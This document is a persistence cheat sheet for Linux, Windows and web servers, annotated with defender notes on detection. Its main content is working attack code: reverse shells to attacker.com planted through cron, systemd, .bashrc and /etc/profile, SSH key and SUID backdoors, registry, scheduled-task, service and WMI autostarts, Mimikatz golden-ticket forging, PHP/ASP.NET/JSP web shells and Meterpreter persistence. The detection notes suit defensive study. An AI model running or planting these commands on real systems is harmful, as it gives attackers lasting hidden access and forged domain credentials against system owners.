Persistence
Linux Persistence
SSH Keys
# Generate SSH key
# Defender note: a public key appended to authorized_keys is a login path that
# survives password resets. Baseline the contents of every authorized_keys file,
# watch them for writes (e.g. an auditd -w rule on the file), and alert on keys
# whose comment/fingerprint is not in the expected inventory.
ssh-keygen -t rsa
# Add to authorized_keys
# The chmod only tightens the file mode after the append; it is not what makes
# the key work, so a looser mode is not itself a sign of tampering.
echo "PUBLIC_KEY" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Add to user
# Same detection applies per user. sshd's AuthorizedKeysFile can point at a
# root-owned, non-user-writable location so a compromised user process cannot
# grant itself a key this way.
echo "PUBLIC_KEY" >> /home/user/.ssh/authorized_keys
Cron Jobs
# Add cron job
# Defender note: both entries run a reverse shell every minute. The first lands
# in the user's own crontab (visible with crontab -l), the second in
# /etc/crontab. Monitor those paths for writes and alert on cron-spawned bash
# processes with an outbound socket; the /dev/tcp/host/port target is readable
# in the process command line.
(crontab -l ; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'") | crontab -
# System-wide cron
# The extra 'root' field is the run-as user that /etc/crontab (unlike a user
# crontab) requires; a system crontab line naming root is a high-value hunt hit.
echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" >> /etc/crontab
Systemd Service
# Create service file
# Defender note: a unit dropped in /etc/systemd/system with Restart=always
# re-spawns the reverse shell every time the connection dies. Inventory units
# (systemctl list-unit-files) and diff /etc/systemd/system against what the
# package manager owns; the ExecStart line names the callback host and port in
# clear text, so unit-file content is a good hunting target.
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
# Enable service
# 'enable' honours WantedBy= above by creating a symlink under
# multi-user.target.wants, a durable on-disk artifact that survives reboots;
# 'start' only launches it for the current boot.
systemctl enable backdoor.service
systemctl start backdoor.service
Bashrc/Profile
# Add to .bashrc
# Defender note: the appended line runs in the foreground of every interactive
# shell (root's .bashrc) or every login (/etc/profile, all users), so the
# session blocks until the callback fails. Watch shell rc/profile files for
# modification and alert on login shells whose stdin/stdout are a network
# socket rather than a tty.
echo "bash -i >& /dev/tcp/attacker.com/4444 0>&1" >> /root/.bashrc
# Add to profile
# /etc/profile is root-owned and read by every login shell; a change here is
# always worth investigating.
echo "bash -i >& /dev/tcp/attacker.com/4444 0>&1" >> /etc/profile
SUID Backdoor
# Copy bash
# Defender note: when the copy is made by root, the setuid bit (4755) gives any
# local user an effective-uid-0 shell from a dotfile in /tmp. Enumerate setuid
# binaries regularly (find / -perm -4000 -type f) and compare against a
# baseline; mounting /tmp with nosuid makes this particular placement inert.
cp /bin/bash /tmp/.hidden
chmod 4755 /tmp/.hidden
# Execute
# -p makes bash keep the effective uid instead of dropping back to the real uid.
/tmp/.hidden -p
Windows Persistence
Registry Run Keys
# Current user
# Defender note: Run/RunOnce are the most commonly audited autostart keys.
# Baseline them (e.g. Sysinternals Autoruns) and alert on value creation under
# these keys, particularly values pointing at user-writable paths.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\path\to\backdoor.exe"
# Local machine
# The HKLM key needs administrative rights and starts the binary for every user
# who logs on, not just the one who wrote it.
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\path\to\backdoor.exe"
# RunOnce
# RunOnce values are deleted after their first execution, so the registry
# artifact may already be gone by the time the host is examined; rely on
# process-creation telemetry as well.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Backdoor /t REG_SZ /d "C:\path\to\backdoor.exe"
Scheduled Tasks
# Create scheduled task
# Defender note: task definitions are stored on disk as XML and task creation is
# recorded in the Task Scheduler operational event log. Alert on tasks created
# with /ru System (or -RunLevel Highest below) outside of known deployment
# tooling, and on task actions that point at non-standard paths.
schtasks /create /tn "Backdoor" /tr "C:\path\to\backdoor.exe" /sc onlogon /ru System
# Run every hour
# A fixed hourly trigger produces a regular execution cadence that stands out
# in process-creation telemetry.
schtasks /create /tn "Backdoor" /tr "C:\path\to\backdoor.exe" /sc hourly /ru System
# PowerShell
# -WindowStyle Hidden in a task's action arguments is a common hunting
# indicator; the same log sources as above apply to Register-ScheduledTask.
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -Command <command>"
$trigger = New-ScheduledTaskTrigger -AtLogon
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "Backdoor" -RunLevel Highest
Services
# Create service
# Defender note: sc create requires administrative rights and registers the
# service in the SCM database; service installation is logged in the System
# event log (event ID 7045), which is a high-signal alert source. start= auto
# means it launches at every boot.
sc create Backdoor binpath= "C:\path\to\backdoor.exe" start= auto
sc start Backdoor
# Modify existing service
# Repointing an existing service's binary path avoids creating a new service
# name, so compare each service's ImagePath against a baseline rather than only
# looking for new services.
sc config <service_name> binpath= "C:\path\to\backdoor.exe"
Startup Folder
# Copy to startup
# Defender note: anything in a Startup folder runs at logon with the user's
# privileges and needs no registry change. Monitor file creation in both
# Startup folders and review them as part of autostart baselining.
copy backdoor.exe "C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
# All users
# The ProgramData folder applies to every user and normally needs
# administrative rights to write to.
copy backdoor.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
WMI Event Subscription
# Create event filter
# Defender note: a permanent WMI event subscription is stored in the
# root\subscription namespace and survives reboots with no file or Run key.
# Enumerate __EventFilter, CommandLineEventConsumer and
# __FilterToConsumerBinding instances in that namespace and baseline them; the
# WMI-Activity operational log and Sysmon's WMI event types record creation.
$FilterArgs = @{
name='Backdoor Filter'
EventNameSpace='root\CimV2'
QueryLanguage='WQL'
Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $FilterArgs
# Create consumer
# The consumer holds the command line that the subscription executes; a
# CommandLineEventConsumer pointing at a non-system path is a strong indicator.
$ConsumerArgs = @{
name='Backdoor Consumer'
CommandLineTemplate='C:\path\to\backdoor.exe'
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs
# Bind filter to consumer
# The binding is what makes the subscription live; removing it disarms the
# persistence even if the filter and consumer objects remain.
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{
Filter=$Filter
Consumer=$Consumer
}
Golden Ticket
# Mimikatz
# Defender note: a golden ticket is a TGT forged with the krbtgt account's
# hash (/rc4 here), so it stays valid until that hash changes. Recovery means
# resetting the krbtgt password twice (to expire the old key as well).
# Detection: TGS requests from an account with no matching TGT request, and
# tickets whose lifetime or user/RID combination does not match domain policy.
# /ptt injects the ticket into the current session without writing a file.
kerberos::golden /domain:domain.local /sid:S-1-5-21-... /rc4:NTHASH /user:Administrator /id:500 /ptt
# Export
# /ticket writes the forged ticket to disk (golden.kirbi), a file artifact to
# look for on compromised hosts.
kerberos::golden /domain:domain.local /sid:S-1-5-21-... /rc4:NTHASH /user:Administrator /id:500 /ticket:golden.kirbi
DLL Hijacking
# Find DLL load order
# Place malicious DLL in higher priority path
# Defender note: this relies on a process searching a writable directory before
# the directory holding the legitimate DLL. Mitigations are tightening ACLs on
# application directories and having applications load DLLs by full path or
# with safe-search settings; detection is image-load telemetry showing an
# unsigned or unexpected DLL loaded from an application or user-writable folder.
copy malicious.dll "C:\path\with\higher\priority\"
Web Shells
PHP Web Shell
<?php
// Defender note: executes any value of the 'cmd' query parameter with the web
// server's account, with no authentication. Hunt for new or modified .php
// files in the webroot, access-log entries carrying a cmd= parameter, and the
// PHP worker process spawning a shell. Setting disable_functions to include
// system in php.ini removes this primitive entirely.
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
ASP.NET Web Shell
<%@ Page Language="C#" %>
<%
// Defender note: runs cmd.exe with the 'cmd' request value as its argument
// under the application pool identity and echoes the output back in the
// response. Hunt for w3wp.exe spawning cmd.exe, for unexpected .aspx files in
// the site directory, and for requests containing a cmd parameter; a
// low-privilege app pool account limits the blast radius.
Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c " + Request["cmd"]).StandardOutput.ReadToEnd());
%>
JSP Web Shell
<%
// Defender note: passes the 'cmd' request parameter straight to Runtime.exec
// and streams the process output into the page, running as the servlet
// container's account. Hunt for Java processes spawning shells, for JSP files
// that were not part of the deployed application, and for requests with a
// cmd parameter; file-integrity monitoring on the webapp directory catches
// the drop.
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
int i;
// Byte-at-a-time copy of the process stdout into the HTTP response.
while((i = in.read()) != -1) {
out.print((char)i);
}
%>
Meterpreter Persistence
# Run persistence module
# Defender note: -X installs the payload to start at boot, -i 60 makes it call
# back every 60 seconds, and -r/-p are the callback host and port. The fixed
# beacon interval is a regular network pattern that outbound-connection
# monitoring can pick up; the on-disk and autostart artifacts it leaves are
# those covered by the registry and scheduled-task notes above.
run persistence -X -i 60 -p 4444 -r attacker.com
# Exploit
# The registry_persistence module, as its name suggests, relies on the Run
# keys discussed earlier; the same autostart baselining applies.
exploit/windows/local/persistence
exploit/windows/local/registry_persistence
Useful Links
Linux Persistence
Windows Persistence
Web Shells